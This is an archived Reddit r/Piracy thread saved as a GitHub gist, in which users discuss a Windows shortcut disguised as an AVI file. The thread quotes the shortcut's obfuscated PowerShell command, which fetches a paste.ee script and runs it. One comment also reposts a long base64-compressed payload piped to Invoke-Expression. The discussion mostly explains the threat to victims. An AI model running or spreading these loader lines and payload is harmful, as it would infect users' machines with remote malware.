Skip to content

Instantly share code, notes, and snippets.

@ohhdemgirls

ohhdemgirls/ran_across_a_shortcut_disguised_as_an_avi_file.html Secret

Created March 23, 2019 02:19
Show Gist options
  • Save ohhdemgirls/a237f11b16c83ba943bd3bc29663a830 to your computer and use it in GitHub Desktop.
Save ohhdemgirls/a237f11b16c83ba943bd3bc29663a830 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ran_across_a_shortcut_disguised_as_an_avi_file.html
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="../../../../../../../../static/css/lato.css">
<link rel="stylesheet" href="../../../../../../../../static/css/bootstrap-superhero.min.css">
<link rel="stylesheet" href="../../../../../../../../static/css/archive.css">
<title>r/Piracy: Ran Across a Shortcut Disguised as an AVI File</title>
</head>
<body>
<header>
<nav class="navbar navbar-expand-sm navbar-dark bg-primary">
<a class="navbar-brand" href="../../../../../../../../Piracy/index.html">r/Piracy</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" href="../../../../../../../../Piracy/index.html">score</a>
</li>
<li class="nav-item">
<a class="nav-link" href="../../../../../../../../Piracy/index-comments/index.html">comments</a>
</li>
<li class="nav-item">
<a class="nav-link" href="../../../../../../../../Piracy/index-date/index.html">date</a>
</li>
<li class="nav-item ###URL_SEARCH_CSS###">
<a class="nav-link" href="../../../../../../../../Piracy/search.html">search</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">subreddits</a>
<div class="dropdown-menu" aria-labelledby="navbarDropdown">
<a class="dropdown-item" href="../../../../../../../../index.html">All</a>
<a class="dropdown-item" href="../../../../../../../../Piracy/index.html">Piracy</a>
</div>
</li>
</ul>
</div>
</nav>
</header>
<main role="main" class="container-fluid">
<div class="submission pt-3" data-id="9o7s0f">
<h3 class="title">Ran Across a Shortcut Disguised as an AVI File</h3>
<p><span class="badge badge-primary">1</span>&nbsp;&nbsp;2018-10-15 by <a class="author" href="../../../../../../../../user/killthealias.html">killthealias</a></p>
<div class="card bg-dark mb-3"><div class="card-body md"><p>Had the following code embedded in it </p>
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString(&#39;<a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a>&#39;);IEX $wcli </p>
<p>Can anyone make sense of it? Should I do anything to protect myself after accidentally running it? </p>
</div></div>
</div>
<div class="comments">
<h5>29 comments</h5>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s29gs">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p>
<div class="md"><p>It&#39;s downloading from <a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a> and then running whatever it downloads. Didn&#39;t open the link myself as it is going to be malware/virus/etc...</p>
<p>You should probably clean your computer</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7tprm2">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/NukeOfTheShadow.html">NukeOfTheShadow</a> 2018-10-15</p>
<div class="md"><p>“Page not found“</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s2uqi">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>You know paste.ee is a pastebin alternative right? It&#39;s just a page full of text. Jeez.</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3jeu">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p>
<div class="md"><blockquote>
<p>It&#39;s just a page full of text. Jeez. Opening the link in your browser won&#39;t do anything</p>
</blockquote>
<p>I never said it was going to do anything.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4mj4">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><blockquote>
<p>Didn&#39;t open the link myself as it is going to be malware/virus/etc...</p>
</blockquote>
<p>You are saying the reason you didn&#39;t open the link was because it may be malware. Nothing is wrong with opening the link in a browser. The harmful part would be executing the script in PowerShell.</p>
</div>
</div>
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s5cxg">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p>
<div class="md"><p>I was saying I didn&#39;t open the link cause I knew what it most likely was and wasn&#39;t going to analyze its contents. Though I can see how you could interpret what I wrote how you did</p>
</div>
</div>
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s7114">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>Sorry, I&#39;m just not feeling well today and haven&#39;t slept properly in a few days. I get kinda agitated easily.</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3m9c">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/huckpie.html">huckpie</a> 2018-10-15</p>
<div class="md"><p>From what I can tell, the script downloads that paste to a text file and executes it. The file itself appears to be some obfuscated VBS which as we all know has been used for malicious intent.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4fbo">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p>
<div class="md"><p>How would the script execute itself though? Is it meant to be opened with a specific media player that allows for powershell scripts? </p>
</div>
</div>
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s6rmf">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p>
<div class="md"><p>The shortcut isn&#39;t an AVI file, it&#39;s just a shortcut with .avi in the name of the shortcut.</p>
<p>The shortcut leads to powershell, which is installed on most PCs. It tried to download the raw content of a pastebin, save it as a script, and execute it.</p>
<p>This attack would fail on most systems, because the script would not be signed and most people are on the default security settings for powershell.</p>
</div>
</div>
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s6w26">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p>
<div class="md"><p>Ah you mean, notavirus.avi.ps1? That&#39;s amateurish, I considered that scenario but honestly didn&#39;t believe people would post about such an obvious attack vector.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7sgxu5">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p>
<div class="md"><p>It seems the link is dead. I don&#39;t suppose you still have the data for it so I can study it?</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s46mo">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drzendoom.html">drzendoom</a> 2018-10-15</p>
<div class="md"><p>yeah, i got hit as well, any solutions?</p>
<p>&amp;#x200B;</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s4nvq">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>How exactly was it &quot;disguised&quot; as an AVI file?</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s4ttn">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/Halfpipe1234.html">Halfpipe1234</a> 2018-10-15</p>
<div class="md"><p>I&#39;m guessing a streaming site or something</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s73us">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>This would require it to be downloaded and executed though. In that case it would be obvious it&#39;s not an AVI file.</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s80sx">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p>
<div class="md"><p>Could be placed in a RAR/ZIP that&#39;s been 0-byte padded to look large, then you right click -&gt; extract -&gt; double click it.</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7sfq7c">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>But you would see the file extension is not avi after extraction.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7skayx">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p>
<div class="md"><p>That is inaccurate.</p>
</div>
</div>
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7ue4oh">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>That&#39;s actually exactly how I thought they did it. However if you have file extensions DISABLED normally you would find it weird to see it there. (I always have them enabled.) I also have shortcut arrows removed, so tbh this is the perfect thing to target me, except for the fact that I use MPC-HC as default so I&#39;d notice something wrong with the file icon.</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s87o3">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/exodus_cl.html">exodus_cl</a> 2018-10-15</p>
<div class="md"><p>an avi file with that string??? could you share more info?</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7uzpu2">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p>
<div class="md"><p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString(&#39;<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>&#39;);IEX $wcli</p>
<p>here is the <a href="https://paste.ee">paste.ee</a> site.. </p>
<p>( nEW-OBJEcT Io.cOMPRESSIoN.DeFlaTesTrEAM([io.meMoRystREAM] [SysTEM.cOnvErT]::FroMbAsE64sTRINg(&#39;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&#39; ) ,[sYStEm.io.COmPReSsioN.coMPRESSIoNmoDE]::dEcOMpreSS ) |FoREaCH-oBJECT{ nEW-OBJEcT systEM.Io.StREAmReADeR($_ , [teXT.EnCoDIng]::aScIi )}).REaDtOEND( )| inVokE-eXPrESSion </p>
<p>&amp;#x200B;</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sb1s9">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/RobinsonDickinson.html">RobinsonDickinson</a> 2018-10-15</p>
<div class="md"><p>so how did u get it in the first place? a file just dont random download itself..</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sh0n5">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/CaineBK.html">CaineBK</a> 2018-10-15</p>
<div class="md"><p>Relevant flair. </p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sfol5">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p>
<div class="md"><p>I&#39;m not expert by many means but it seems that the page it tries to retrieve data from has been removed by the website itself so I would imagine that its intended payload was never retrieved thus... a dead malware file? I could be totally wrong though. </p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sjtom">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/waSItaSdm.html">waSItaSdm</a> 2018-10-15</p>
<div class="md"><p>Yes, the link is dead so there&#39;s no string to download and execute. Got lucky this time.</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sxtfw">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/streamingisretarded.html">streamingisretarded</a> 2018-10-15</p>
<div class="md"><p>that&#39;ll learn ya for downloading crazy rich asians</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7t7jbf">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/EqualityOfAutonomy.html">EqualityOfAutonomy</a> 2018-10-15</p>
<div class="md"><p>Since that page is 404 you may have been lucky and it didn&#39;t work as intended.</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7uzg3l">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p>
<div class="md"><p>Here is the script i got..</p>
<p>&amp;#x200B;</p>
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString(&#39;<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>&#39;);IEX $wcli</p>
</div>
</div>
</div>
</main>
<footer class="container-fluid">
<a class="to-top mt-1 mb-1 btn btn-lg btn-primary" href="#top">top of page</a>
<p class="small mb-0">data archived 2018-10-15. <a href="https://github.com/libertysoft3/reddit-html-archiver">source code</a>.</p>
</footer>
<script src="../../../../../../../../static/js/jquery-3.3.1.slim.min.js"></script>
<script src="../../../../../../../../static/js/bootstrap.min.js"></script>
<script src="../../../../../../../../static/js/archive-comments.js"></script>
</body>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment